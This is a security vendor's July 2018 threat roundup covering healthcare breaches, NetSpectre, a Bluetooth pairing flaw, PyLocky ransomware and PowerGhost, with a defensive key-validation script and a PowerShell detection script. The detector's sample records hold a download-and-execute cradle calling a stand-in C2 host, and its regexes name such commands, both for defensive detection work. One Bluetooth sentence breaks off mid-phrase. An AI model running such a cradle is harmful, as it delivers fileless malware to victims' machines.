Top threats July 2018: paying respect by rewriting malware in Python
Threat researchers and academics often tell me “this summer we can finally do some work”. So we never expect summer to be quiet on the threat side. That said, DEF CON and Black Hat, the “infosec summer camp”, are in August, and many keep their work close until then. So, let’s see what July had in store for us:
Global healthcare breaches
Two major breaches within the healthcare sector were reported in July. In the first one, a Canadian healthcare services provider experienced a data breach in which the attackers gained access to employee and patient health records and demanded a ransom to avoid leaking the data online. This type of extortion has been steadily increasing in frequency over the last 2 years. The stolen data included Personally Identifiable Information (PII) such as dates of birth, health numbers, phone numbers and details of past surgical procedures and medications. Interestingly, the news broke through the hackers themselves: when the company reported 1,513 stolen records, the hackers sent a sample of 80,000 records. This is interesting for two reasons: first, healthcare doesn’t always have the best reputation with regards to cyber defense, and second, this kind of event will also happen in Europe under the new GDPR law. A few weeks ago, insurance agency AIG even warned that data will be worth more to criminals because of GDPR. While we find that reasoning doubtful, we’re still eager to see how it plays out.
The second breach occurred on July 17th, when SingHealth, the largest healthcare group in Singapore, reported a massive data breach of 1.5 million records from patients who visited between May 2015 and July 2018. One record appeared to be that of Singapore’s Prime Minister Lee Hsien Loong, and contained information about his medication. It was later concluded that the attack was well-planned, sophisticated and targeted, potentially even nation-state sponsored.
In the US, hackers going after VIP patient records is more common, but in other parts of the world the risk has always been deemed low. That’s why this event sparks interest, and this month global healthcare breaches are our top threat.
Researchers published the discovery of a new variant of Spectre, dubbed NetSpectre. This is a major evolution of the Spectre attack which makes it possible for an attacker to steal data remotely. It builds on the Spectre v1 vulnerability (CVE-2017-5753), which the SecureLink CDC reported on in January 2018. Consequently, all CPUs affected by Spectre v1 are most likely affected by NetSpectre as well. NetSpectre is carried out remotely over a network connection and does not need an initial compromise of the target: it exploits a flaw in the speculative execution mechanism. Besides its innovative nature, NetSpectre is, as of August 20th 2018, still regarded as very slow, with an exfiltration speed of barely 15 bits/hour. This makes it rather theoretical, but as with all vulnerabilities, a new PoC could suddenly increase the risk tomorrow.
Further Reading: NetSpectre — New Remote Spectre Attack Steals Data Over the Network
We all love Bluetooth, right? Streaming music, making phone calls from your car: what would we do without it? There’s a reason you disable it when you visit a hacker conference, though.
A new Bluetooth vulnerability affects operating system drivers from vendors such as Apple, Broadcom, Intel and Qualcomm. Two features are affected: Bluetooth Low Energy (LE) implementations of Secure Connections Pairing and Bluetooth Basic Rate/Enhanced Data Rate (BR/EDR) implementations of Secure Simple Pairing. The vulnerability is insufficient validation of the public encryption key received over the air during pairing. Attackers can then perform a man-in-the-middle attack during the pairing process to inject malicious code and/or steal
So maybe disable Bluetooth a bit more often than only when you visit Defcon.
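The missing check described above is a public-key validation step: before a pairing stack feeds the peer’s Diffie-Hellman public key into the key agreement, it has to verify that the key is actually a point on the agreed curve. The following is an added example written for this post (not code from the original article or from any vendor’s Bluetooth stack) that implements that check for NIST P-256, the curve used by LE Secure Connections and BR/EDR Secure Simple Pairing. It assumes the 64-octet wire encoding of X followed by Y, each 32 octets little-endian, as in the LE Pairing Public Key PDU; the curve constants are the published P-256 parameters.

```python
"""Validate a peer's P-256 public key before using it in pairing.

Added example for illustration; not code from the original post or from
any vendor stack. The 64-octet layout (X then Y, 32 octets each,
little-endian) is assumed here to match the LE Pairing Public Key PDU.
"""
from __future__ import annotations

# NIST P-256 domain parameters: y^2 = x^3 + a*x + b over GF(p), cofactor 1.
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
# Base point G, used below only as a known-good sample key.
GX = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
GY = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5


def is_on_curve(x: int, y: int) -> bool:
    """True only if (x, y) is an affine point on P-256.

    Both coordinates must be reduced field elements and must satisfy the
    curve equation; anything else (out-of-range values, a point on some
    other curve, the point at infinity) is rejected.
    """
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def encode_public_key(x: int, y: int) -> bytes:
    """Serialise (x, y) as 64 octets: X little-endian, then Y little-endian."""
    return x.to_bytes(32, "little") + y.to_bytes(32, "little")


def decode_public_key(raw: bytes) -> tuple[int, int]:
    """Parse the 64-octet wire form into integer coordinates (no validation)."""
    if len(raw) != 64:
        raise ValueError("public key must be exactly 64 octets")
    return int.from_bytes(raw[:32], "little"), int.from_bytes(raw[32:], "little")


def accept_peer_public_key(raw: bytes) -> tuple[int, int]:
    """Hardened receiver: abort pairing unless the key is a valid P-256 point.

    A stack that skips this step will run the Diffie-Hellman computation on
    whatever coordinates the peer sent, which is exactly the weakness the
    post describes.
    """
    x, y = decode_public_key(raw)
    if not is_on_curve(x, y):
        raise ValueError("peer public key is not a valid P-256 point; abort pairing")
    return x, y


def peer_public_key_is_valid(raw: bytes) -> bool:
    """Boolean convenience wrapper around accept_peer_public_key()."""
    try:
        accept_peer_public_key(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed samples: the base point (valid) and the same X with Y+1 (off the curve).
    good = encode_public_key(GX, GY)
    off_curve = encode_public_key(GX, (GY + 1) % P)
    print("valid key accepted:   ", peer_public_key_is_valid(good))       # True
    print("off-curve key accepted:", peer_public_key_is_valid(off_curve))  # False
```

Because P-256 has cofactor 1, every point on the curve already lies in the prime-order subgroup, so the on-curve test is sufficient here; on a curve with a larger cofactor the receiver would additionally need a subgroup membership check.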
One of the most notorious ransomware families, Locky, was honored by a bad actor who recreated it in Python. Or at least tried to. Our Cyber Defense Center was among the first to detect this and did some research.
The malware uses the file extension .locky, references Locky in the ransom note and was (surprisingly) written in Python. Several features of the analyzed sample point towards an inexperienced malware developer. The binary was digitally signed with a valid certificate. Tracing the certificate back showed that it was issued to a small UK company which, when looked up online, presented the searcher with a note that it is currently having issues, which indicates that it might have been breached. The certificate was issued on July 24th 2018, 3 days before the SecureLink CDC came across the malware sample in the wild.
Others have given the malware the name “PyLocky”. Despite the UK connection, the malware seems to be targeting France exclusively.
In our Cyber Defense Center, we’re seeing a sudden increase in ransomware after a steady decline over the last months. While we don’t see PyLocky as an enormous risk to many, we’re putting it at number 3 today.
Fileless attacks are hip ’n’ happening. EternalBlue is an easy choice of exploit. A cryptocurrency miner combining the two was pretty much guaranteed to happen, and so PowerGhost, a new fileless cryptocurrency miner, surfaced at the end of July. The malware uses PowerShell and exploits the EternalBlue vulnerability to infect systems and move across them undetected.
One special feature of the malware is that it can also perform DDoS attacks. The malware embeds itself on remote systems by using remote administration tools (RAT), in this case Windows Management Instrumentation (WMI). With the help of a one-line PowerShell script, the miner’s body is downloaded and immediately launched without being written to the hard drive, which makes it harder to notice.
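The two traits just described, PowerShell launched through WMI and a one-liner that downloads its payload and runs it in memory, are what a defender can key on in process-creation telemetry even though no file ever touches disk. The following added example (written for this post, not code from the original article or from any vendor product) scores constructed process-creation records for those indicators. The `Key=Value | Key=Value` record format and the sample lines are assumptions made so the block runs offline; in a real pipeline the same fields would come from Sysmon Event ID 1 or Windows Security event 4688.

```python
"""Flag fileless PowerShell download-and-execute behaviour launched via WMI.

Added example; detection logic written for this post, not from any product.
Records use a constructed "Key=Value | Key=Value" format for self-containment.
"""
import re

# Reason labels attached to a record by score_record().
R_WMI = "powershell spawned by WMI provider host"
R_DL = "downloads remote content"
R_EXEC = "executes content in memory (IEX/Invoke-Expression)"
R_EVADE = "hidden window / no profile / encoded command options"

# Indicators of a download cradle: fetch remote content into memory.
DOWNLOAD_PATTERNS = re.compile(
    r"downloadstring|downloadfile|downloaddata|net\.webclient|"
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b",
    re.IGNORECASE,
)
# Indicators that fetched text is evaluated as code rather than saved.
EXEC_PATTERNS = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)
# Options that hide the console or avoid profiles/logging; weak on their own.
EVASION_PATTERNS = re.compile(
    r"-nop\b|-noprofile|-noni\b|-noninteractive|"
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b",
    re.IGNORECASE,
)

# Constructed sample telemetry (not real captures). Domains use .invalid.
SAMPLE_RECORDS = [
    r"ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r" | CommandLine=powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    r"ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r" | CommandLine=powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')\"",
    r"ParentImage=C:\Windows\System32\services.exe | Image=C:\Windows\System32\svchost.exe"
    r" | CommandLine=svchost.exe -k netsvcs",
    r"ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r" | CommandLine=powershell.exe -NonInteractive -EncodedCommand <base64 omitted>",
]


def parse_record(line: str) -> dict:
    """Split a 'Key=Value | Key=Value' record into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def score_record(rec: dict) -> list:
    """Return the list of indicator reasons present in one record."""
    image = rec.get("Image", "").lower()
    parent = rec.get("ParentImage", "").lower()
    cmd = rec.get("CommandLine", "")
    reasons = []
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons  # only PowerShell hosts are scored here
    if parent.endswith("wmiprvse.exe"):
        reasons.append(R_WMI)
    if DOWNLOAD_PATTERNS.search(cmd):
        reasons.append(R_DL)
    if EXEC_PATTERNS.search(cmd):
        reasons.append(R_EXEC)
    if EVASION_PATTERNS.search(cmd):
        reasons.append(R_EVADE)
    return reasons


def is_suspicious(reasons: list) -> bool:
    """Alert on download+execute in one line, or WMI-spawned PowerShell with any other indicator.

    A lone -NoProfile or hidden window is common in legitimate admin scripts,
    so a single evasion indicator by itself does not raise an alert.
    """
    cradle = R_DL in reasons and R_EXEC in reasons
    wmi_plus = R_WMI in reasons and len(reasons) > 1
    return cradle or wmi_plus


def scan(lines: list) -> list:
    """Return [(index, reasons)] for every record that is_suspicious()."""
    hits = []
    for i, line in enumerate(lines):
        reasons = score_record(parse_record(line))
        if is_suspicious(reasons):
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_RECORDS):
        print(f"record {idx}: " + "; ".join(why))
```

Running the block flags records 1 and 3 (the WMI-spawned download cradle and the WMI-spawned encoded command) while leaving the scheduled backup script and the svchost entry alone; tuning the `is_suspicious()` rule is where an analyst trades false positives against coverage for this family.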
A big thank you to Diana Selck and the CDC teams for providing the input!